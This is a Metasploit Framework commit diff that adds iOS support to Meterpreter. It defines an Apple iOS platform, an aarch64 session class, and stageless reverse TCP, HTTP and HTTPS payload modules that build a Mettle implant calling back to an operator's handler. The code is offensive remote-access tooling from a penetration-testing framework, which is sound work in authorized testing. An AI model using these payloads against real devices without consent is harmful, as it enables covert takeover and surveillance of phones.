iOS meterpreter

2017-12-12 16:05:23 +08:00 · 2017-12-12 16:05:23 +08:00 · c4e20e01e3
parent d79b0ad981
commit c4e20e01e3
8 changed files with 174 additions and 3 deletions
--- a/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb
+++ b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb
@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'apple_ios'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@ -560,4 +560,12 @@ class Msf::Module::Platform
    Alias = "hardware"
  end

+  #
+  # Apple iOS
+  #
+  class Apple_iOS < Msf::Module::Platform
+    Rank = 100
+    Alias = "apple_ios"
+  end
+
 end
--- a/lib/msf/core/payload/uuid.rb
+++ b/lib/msf/core/payload/uuid.rb
@ -72,7 +72,8 @@ class Msf::Payload::UUID
    21 => 'python',
    22 => 'nodejs',
    23 => 'firefox',
-    24 => 'r'
+    24 => 'r',
+    25 => 'apple_ios',
  }

  # The raw length of the UUID structure
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
            'BadChars'    => '',
            'DisableNops' => true
          },
-        'Platform'       => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
+        'Platform'       => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
        'Arch'           => ARCH_ALL,
        'Targets'        => [ [ 'Wildcard Target', {} ] ],
        'DefaultTarget'  => 0,
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'http',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTPS Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttps,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'https',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'tcp',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end
--- a/tools/modules/generate_mettle_payloads.rb
+++ b/tools/modules/generate_mettle_payloads.rb
@ -25,6 +25,7 @@ arches = [
  ['x86',       'Linux', 'i486-linux-musl'],
  ['zarch',     'Linux', 's390x-linux-musl'],
  ['x64',       'OSX',   'x86_64-apple-darwin'],
+  ['aarch64',   'Apple_iOS',   'aarch64-iphone-darwin'],
 ]

 arch = ''
@ -42,7 +43,7 @@ arches.each do |a, pl, pa|

    template = File::read(File::join(cwd, "meterpreter_reverse.erb"))
    renderer = ERB.new(template)
-    filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb")
+    filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb")
    File::write(filename, renderer.result())
  end
 end